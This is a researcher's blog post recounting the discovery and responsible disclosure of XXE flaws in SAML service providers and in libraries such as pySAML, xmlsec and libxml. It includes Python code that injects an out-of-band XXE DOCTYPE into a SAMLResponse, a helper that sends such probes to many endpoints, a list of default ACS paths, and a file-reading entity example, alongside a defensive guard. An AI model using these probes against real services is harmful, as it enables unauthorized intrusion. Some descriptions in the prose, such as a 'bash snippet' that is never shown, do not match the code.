Following the white Rabbit
Down the SAML Code
This post is a more detailed and personal write-up of the https://www.okta.com/blog/ post. If you are interested in the short, to-the-point version, please follow the link. In any case, let’s get down to it. So what is SAML?
Security Assertion Markup Language
According to Wikipedia: “SAML is an XML-based, open-standard data format for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. SAML is a product of the OASIS Security Services Technical Committee. SAML dates from 2001; the most recent major update of SAML was published in 2005, but protocol enhancements have steadily been added through additional, optional standards.
The single most important requirement that SAML addresses is web browser single sign-on (SSO). Single sign-on is common at the intranet level (using cookies, for example) but extending it beyond the intranet has been problematic and has led to the proliferation of non-interoperable proprietary technologies. (Another more recent approach to addressing the browser SSO problem is the OpenID Connect protocol.)”
Out of that we can determine one simple but important fact: SAML is XML. Because of this, a lot of developers build their applications using third-party XML parsers, or write their own, to parse the SAML payloads. Either choice can turn out to be a bad thing in itself. As we all know, XML is a very rich format that can be exploited in several ways. One of those ways is XXE (XML External Entity), a vulnerability that allows an attacker to make the parser load remote entities and read local files, among other things.
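To make the entity mechanism concrete, here is a minimal sketch, assuming Python's standard library parser purely for illustration. It parses a document with a harmless internal entity to show that the parser substitutes entity text into the content. The external form is included only as a string so the shape of an XXE declaration is visible; it is never parsed here, and the file path in it is just a placeholder.

```python
import xml.etree.ElementTree as ET

# Internal entity: the replacement text is defined inside the document itself.
INTERNAL_DOC = '<!DOCTYPE r [<!ENTITY greet "hello">]><r>&greet; world</r>'

# External entity: same syntax, but SYSTEM points the parser at a URI.
# Shown only as a string for comparison; it is never parsed in this sketch.
EXTERNAL_DOC_SHAPE = (
    '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
    "<r>&xxe;</r>"
)


def expanded_text(document: str) -> str:
    """Parse the document and return the root element's text after entity expansion."""
    return ET.fromstring(document).text


if __name__ == "__main__":
    print(expanded_text(INTERNAL_DOC))
```

A parser that resolves the external form the same way it resolves the internal one will place the contents of the referenced file or URL into the parsed document, which is the whole problem.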
Back in August, we found that a third-party cloud application we use was vulnerable to an XXE attack. After finding it, we created a proper write-up and followed up with the company’s security team using our Responsible Vulnerability Disclosure process, but at the same time we raised a question:
“If they are vulnerable, who else will be?”
Known XXE vulnerabilities in Java libraries, and in libraries for other languages, date back to 2013, so I thought this was for the most part a fixed problem and there was nothing new to find. Nevertheless, being as hard-headed as I am, I retested all known SAML SP endpoints; but where would I get a list? Totally kidding. I work for a cloud Identity Provider, and our own app has one of the biggest SAML integration lists in the world. :-) I had plenty of ACS endpoints to test.
Proof of Concept
At first, I tested things manually, either by using a custom proxy to replace the SAMLResponse with a simple malicious XML document, or by running the original response through a script that injected a proof-of-concept XXE payload into the POST request and had an even simpler listener embedded. The bash snippet below shows how we get a response back from a fake 22.214.171.124 IP.
To build a proof of concept of your own, you can take a SAMLResponse from any POST request and, using the methods below, generate a non-malicious payload that lets you check whether or not you are vulnerable.
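As a rough illustration of that step, here is a minimal Python sketch. It is not the original snippet: the function name `build_xxe_probe` and the callback URL are hypothetical, and it assumes the SAMLResponse came from the HTTP-POST binding, where the form field is plain base64-encoded XML. The injected DOCTYPE only asks the parser to fetch a URL you control, so a hit on your listener tells you that external entities are being resolved.

```python
import base64
import re


def build_xxe_probe(saml_response_b64: str, callback_url: str) -> str:
    """Return a base64 SAMLResponse with a DOCTYPE that pings callback_url.

    callback_url is a hypothetical listener that you control.
    """
    xml = base64.b64decode(saml_response_b64).decode("utf-8")

    # A parameter entity is fetched while the DTD is processed, so the
    # request fires even if the document body never references it.
    doctype = f'<!DOCTYPE probe [<!ENTITY % ping SYSTEM "{callback_url}"> %ping;]>'

    # The DOCTYPE has to come after the XML declaration, if there is one.
    declaration = re.match(r"<\?xml[^>]*\?>", xml)
    split_at = declaration.end() if declaration else 0
    probe = xml[:split_at] + doctype + xml[split_at:]

    return base64.b64encode(probe.encode("utf-8")).decode("ascii")
```

The returned value still has to be URL-encoded when it is placed in the `SAMLResponse` form field, and it should only be sent to services you are authorized to test.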
After a few hours, I had four new vulnerable services, appliances, etc., but this got boring very fast, given that manually testing each SAMLResponse was not fun. Not to mention the long responsible-disclosure emails for each application or appliance we found. And to make it even worse, sites turned out to be vulnerable when tested with the simple XXE string mentioned above, which was not even a valid SAML response. :(
List of vulnerable services/appliances:
- Lucidchart ( fixed )
- Mimecast ( fixed )
- OrgWiki ( fixed )
- SumoLogic ( fixed )
- Tableau ( fixed )
- Univention UMC ( fixed )
- Code42 ( fixed )
- among many others …
The best Security Team is an Automated “Lazy” one
I am a strong believer that “running yourself out of a job through automation” is the best way to scale, and that it lets you concentrate on better challenges that can’t be automated “just yet”. So, to stay in agreement with my own philosophy, I created a Ruby script that allowed me to easily test new SAML SPs while I was busy searching for more endpoints to test.
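A minimal sketch of that kind of automation, written in Python rather than Ruby and not the script itself. The helper names `build_probe_requests` and `send_all` are hypothetical, and the probe value is assumed to be an already base64-encoded SAMLResponse. Building the requests is kept separate from sending them so the list can be reviewed before anything goes out.

```python
import urllib.error
import urllib.parse
import urllib.request


def build_probe_requests(endpoints, saml_response_b64):
    """Build one form-encoded POST per SP endpoint, without sending anything."""
    # urlencode percent-encodes '+', '/' and '=' from the base64 alphabet.
    body = urllib.parse.urlencode({"SAMLResponse": saml_response_b64}).encode("ascii")
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    return [
        urllib.request.Request(url, data=body, headers=headers, method="POST")
        for url in endpoints
    ]


def send_all(requests, timeout=10):
    """Send each request and record the HTTP status, or the error text."""
    results = {}
    for request in requests:
        try:
            with urllib.request.urlopen(request, timeout=timeout) as response:
                results[request.full_url] = response.status
        except urllib.error.HTTPError as exc:
            # Most SPs answer an invalid assertion with a 4xx or 5xx.
            results[request.full_url] = exc.code
        except (urllib.error.URLError, OSError) as exc:
            results[request.full_url] = str(exc)
    return results
```

The HTTP status is only bookkeeping. The signal that matters is whether the listener named in the payload receives a request from the service under test.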
The more you have, the more you want ..
To find more, I needed the help of Google or Bing to learn what the most common SAML libraries use as their default path. It was a big assumption, but most people using a third-party library will almost certainly not change the default endpoint.
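As an illustration of the default-path idea, here is a small Python sketch that expands a base URL into candidate endpoints. The paths listed are assumptions recalled from each project's commonly documented defaults and should be checked against current documentation; the helper name `candidate_endpoints` is hypothetical.

```python
from urllib.parse import urljoin

# Assumed defaults; verify each one against the project's own documentation.
DEFAULT_ACS_PATHS = [
    ("Shibboleth SP", "/Shibboleth.sso/SAML2/POST"),
    ("Spring Security SAML", "/saml/SSO"),
    ("SimpleSAMLphp", "/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp"),
    ("omniauth-saml", "/auth/saml/callback"),
]


def candidate_endpoints(base_url: str):
    """Return (library, url) pairs for each assumed default ACS path."""
    root = base_url.rstrip("/") + "/"
    return [
        (library, urljoin(root, path.lstrip("/")))
        for library, path in DEFAULT_ACS_PATHS
    ]


if __name__ == "__main__":
    for library, url in candidate_endpoints("https://sp.example"):
        print(f"{library}: {url}")
```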
I also realized that a lot of appliances were also capable of SAML, so I performed the same type of searches for known appliances.
One such appliance found to be vulnerable, on versions 5.3 and below, was the Carbonate Pro server from Code42. After we reported the vulnerabilities, they told us they were already aware of the issue and were in the process of providing fixes. https://httpsonly.blogspot.com.au/2017/01/0day-writeup-xxe-in-ubercom.html
Thankfully, most sites were not vulnerable, but the number of vulnerable sites we found was still high. XXE is a serious vulnerability, and the fact that these cases were not known raised some alarms in my paranoid mind. Could it be that this was not only due to developers coding it improperly, but also to the libraries themselves being unpatched?
Around that time, one of the companies I had reported the issue to came back asking whether I could retest, telling me that they had updated all libraries to the latest available version. I quickly retested and, to our surprise, the vulnerability was still there. I asked whether they could share which library and language they were using. I have to say the developers I was working with were awesome and were trying to trace the problem themselves. It is always gratifying to work with people who care.
In any case, I found that pySAML was vulnerable to XXE, but after carefully reviewing the code, we realized the problem was not in pySAML itself but in one of the dependencies it used to sign and verify messages. XMLSEC1, a core library used by several other libraries, was susceptible to XXE.
I immediately reported the vulnerability on their GitHub repository (https://github.com/rohe/pysaml2/issues/366) to get things started, given that a solution could be implemented at the Python level. But the more I looked into the code, the more it seemed that XMLSEC was the responsible one, which led us to create yet another vulnerability report (https://github.com/lsh123/xmlsec/issues/43). While writing that report, we finally came to the conclusion that the issue was not completely their fault either. XMLSEC uses libXML, a core library from the GNOME project, and even though XXE issues in that library had been reported and fixed a few years earlier, this was a new, as yet undiscovered, vulnerable path. Nevertheless, I reported the issue to XMLSEC, because while reviewing the code I still felt it was XMLSEC’s responsibility to correctly parse and filter this.
A few hours after the report, the lead developer of XMLSEC created a ticket on libXML; he had independently confirmed that the problem was indeed in libXML. https://bugzilla.gnome.org/show_bug.cgi?id=772726 To recap, at this point we not only had several vulnerable applications, but we had also found an XXE in a core library, in addition to several other SAML libraries (pySAML, xmlSEC, go-SAML, etc.). What a night!
Sadly, it took the libXML community a long time to come up with a patch that worked without damaging backward compatibility too much, given that the proposed fixes closed the bug but also forced a change in default behavior. Finally, after some time, libXML, xmlSEC, go-SAML, pySAML and the other known vulnerable libraries have a patch. Most of them implemented a fix at their own level because there was no answer from the main libXML project. The result is an even stronger environment, since each layer now has its own protection and does not rely on a third-party library’s security to prevent attacks.
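The idea of each layer protecting itself can be sketched as a small guard that runs before a SAML message reaches signature verification. This is a minimal Python sketch under that assumption and not the fix any of the libraries above actually shipped; the names `DoctypeForbidden` and `reject_doctype` are hypothetical. SAML messages have no legitimate need for a DOCTYPE, so the guard refuses any document that declares one.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an XML document carries a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> bytes:
    """Return xml_bytes unchanged, or raise if it contains a DOCTYPE."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called at the start of the DOCTYPE, before any entity is declared.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in a SAML message")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    # No external entity handler is installed, so this pass fetches nothing.
    parser.Parse(xml_bytes, True)
    return xml_bytes
```

Malformed XML still raises `xml.parsers.expat.ExpatError`, so a caller would treat both exceptions as a rejected message.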
This was an interesting bug to stumble upon, and now it’s your turn: use the GitHub Gist script to test your custom apps and third-party code, and make the internet less vulnerable.
Credit for reporting this vulnerability to Nokogiri Core goes to Danny Grander email@example.com, @grnd. Thanks, Danny…github.com